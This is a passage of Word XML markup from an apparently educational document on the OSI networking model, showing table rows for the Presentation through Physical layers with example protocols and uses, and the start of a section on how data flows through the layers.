          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50CC52CE" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="499177E3" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB10B24" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Data translation, encryption, and compression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F054F73" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Translation between data formats</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Encryption for security</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Compression for efficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69C5D3DA" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• SSL/TLS (Encryption)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• JPEG, PNG (Image formats)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• MP4, AVI (Video codecs)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• ASCII, Unicode (Text encoding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="655D53AB" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• HTTPS encryption/decryption</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Image format conversion</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Video compression</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Character encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="000CB92B" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2382DB0B" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E19EB3E" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736296D7" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Manages communication sessions between applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2841B6E9" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Session establishment</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Session management</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Session termination</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Synchronization and checkpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C12C568" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• RPC (Remote Procedure Call)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• SQL Sessions</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• NetBIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• PPTP, L2TP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772C32E5" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Database connections</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Remote Desktop (RDP)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Video conferencing (Zoom, Teams)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Online gaming sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="7D8DEA13" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0328627E" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F573445" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7D20EA" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Reliable data delivery and error recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E647D36" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Segmentation of large messages</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Flow control</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Error detection and recovery</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Port addressing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0024500C" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• TCP (Reliable, connection-oriented)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• UDP (Fast, connectionless)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Port Numbers (0-65535)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C1F7E28" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• TCP: Web browsing, email, file transfers</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• UDP: Video streaming, gaming, DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Port 80 (HTTP), 443 (HTTPS), 22 (SSH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="5D793077" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4859D61F" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39784532" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56035226" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Routing data between different networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5873647A" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Logical addressing (IP addresses)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Routing and path determination</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Packet forwarding</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Fragmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DE29301" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• IP (IPv4/IPv6)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• ICMP (ping, traceroute)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• ARP (IP to MAC translation)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• OSPF, RIP, BGP (Routing protocols)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582E82C6" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Router forwarding packets</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• IP addressing (192.168.1.100)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Internet routing</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• VPN connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="36ADA096" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D452A3D" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317213F1" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Data Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0073DDB8" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Node-to-node delivery within same network segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="780D9529" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Physical addressing (MAC addresses)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Frame formation</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Error detection</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Media access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C204460" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Ethernet (Most common LAN)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Wi-Fi (802.11)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• PPP (Point-to-Point)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Frame Relay (Legacy WAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CEBED45" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Switch forwarding frames</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• MAC addresses (aa:bb:cc:dd:ee:ff)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Ethernet frames</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Wi-Fi authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="0154BC9E" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF67DD9" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3446C221" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19922CBB" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Actual transmission of raw bits over physical media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CAB304" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Signal generation</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Media specifications</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Physical topology</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Electrical/optical standards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="564252F4" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Ethernet Physical (10/100/1000BASE-T)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Wi-Fi Physical (802.11 radio)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Fiber Standards (1000BASE-SX)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Serial (RS-232)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="497544D0" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Copper: Cat5e, Cat6, Cat6a cables</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Fiber: Single/multi-mode</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Wireless: 2.4/5 GHz Wi-Fi</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t xml:space="preserve">• Connectors: RJ45, fiber, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:lastRenderedPageBreak/>
              <w:t>antennas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47258399" w14:textId="0CE166DE" w:rsidR="001F0FE1" w:rsidRDefault="001F0FE1" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How Data Flows Through OSI Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84426E" w14:textId="75F54169" w:rsidR="005F16ED" w:rsidRPr="005F16ED" w:rsidRDefault="005F16ED" w:rsidP="005F16ED">
      <w:r>
        <w:t>Imagine you’re sending a photo via a chat app:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8748"/>
        <w:gridCol w:w="8748"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F16ED" w14:paraId="48669C0A" w14:textId="77777777" w:rsidTr="005F16ED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
